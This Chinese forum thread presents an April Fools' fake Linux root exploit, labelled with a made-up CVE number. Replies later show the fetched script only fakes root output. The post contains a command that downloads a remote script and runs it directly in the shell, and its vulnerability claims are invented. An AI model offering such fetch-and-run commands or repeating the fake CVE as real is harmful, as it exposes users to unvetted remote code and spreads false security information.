Linux几乎全版本提权漏洞!【愚人节玩笑】

. <(curl -SsfL https://thc.org/7350pipe)

执行命令即可从普通用户变为Root用户(BASH)。
CVE-20250401 - 7350pipe - Linux Privilege Escalation (all versions). Exploit

由于不能验证命令指向的网站是否可信,请不要在非沙盒环境中运行!!!

29 Likes

现在有没有什么应对措施呢

3 Likes

漏洞刚出来,还是0Day,没什么好办法

只要能远程执行命令就能提权

:clown_face:

6 Likes

谢谢你 服务器变肉鸡了 :laughing:

15 Likes

牛了!!!

1 Like

MARK一下, 这也太恐怖了(原来是我被骗了

哥么, 四月二号了:
eval “$(printf 'id(){ echo “uid=0(root) gid=0(root) groups=0(root)”;};PS1=”# “;touch(){ echo “April Fools!”;}')”


from X

1 Like

呀我忘记看时间了

1 Like

…… 没带 0401 标签我还以为是真的

愚人节快乐啊

行吧 这么玩 -0-

其实不可信这一条我想了想还是加上去了,毕竟是一个脚本,不管怎么Fool,还是要注意一下的

1 Like
# 2025-04-01 TEAM TESO IS BACK
# Linux LPE
# . <(printf 'id\x28){\x20echo\x20"uid\x3d0\x28root)\x20gid\x3d0\x28root)\x20groups=0\x28root)";};PS1\x3d"# ";to\x75ch(){\x20echo\x20"Ap\x72il F\x6f\x6fls!";}')
CY="\033[1;33m" # yellow
CC="\033[1;36m" # cyan
CDG="\033[0;32m" # green
CDY="\033[0;33m" # yellow
CDM="\033[0;35m"
CDR="\033[0;31m" # red
CN="\033[0m"    # none
echo -e "${CC}>>> 7350pipe Linux LPE >3.10.0-2260 (except 5.23.0-130..5.25.0)${CN}"
echo -en "[${CDG}*${CN}] Finding ${CDY}offset "
eval "$(base64 -d <<<Zm9yIHggaW4gezAuLjR9OyBkbyBlY2hvIC1uIC47IHNsZWVwIDAuMzsgZG9uZQ==)"
echo -en "${CDG}FOUND @+0x$$ ${CDY}(${CY}VULNERABLE${CDY})${CN}\n[${CDG}*${CN}] ${CDM}Exploiting..."
eval "$(base64 -d <<<Zm9yIHggaW4gezAuLjEwfTsgZG8gZWNobyAtbiAuOyBzbGVlcCAwLjM7IGRvbmU=)"
# Running the payload :>
echo -e "${CN}\n[${CDG}X${CN}] ${CDR}b00m. Entering root shell${CN}";sleep 1
eval "$(printf 'id\x28){\x20echo\x20"uid\x3d0\x28root)\x20gid\x3d0\x28root)\x20groups=0\x28root)";};PS1\x3d"# ";to\x75ch(){\x20echo\x20"Ap\x72il F\x6f\x6fls!";}')"

直接用浏览器打开是个下载文件, 就没用curl看 –

我加了愚人节标签,但是似乎忘记了现在已经是2/4了

大概看了一下,就是远程下载了这个脚本然后执行,脚本里面是printf( ```
echo “uid=0(root) gid=0(root) groups=0(root)”)
的信息 :rofl:
明晃晃的0401 ,不过大家还是注意安全 要是真是个恶意shell 就中马啦

佬友说的这么专业还以为真的

所以加了愚人节tag,不过带上CVE确实有点唬人

哈哈花花绿绿的终端页面,很符合对安全漏洞的刻板印象(